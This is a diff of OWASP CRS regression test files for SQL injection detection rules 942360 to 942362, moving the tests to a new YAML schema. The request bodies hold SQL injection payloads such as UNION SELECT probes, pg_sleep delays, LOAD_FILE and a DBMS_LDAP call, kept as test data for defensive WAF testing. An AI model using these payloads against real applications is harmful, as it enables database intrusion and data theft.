"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b59..259cc79ba 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -1,126 +1,124 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942361.yaml +rule_id: 942361 tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3f4..27c6d2d09 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -1,552 +1,550 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942362.yaml +rule_id: 942362 tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - 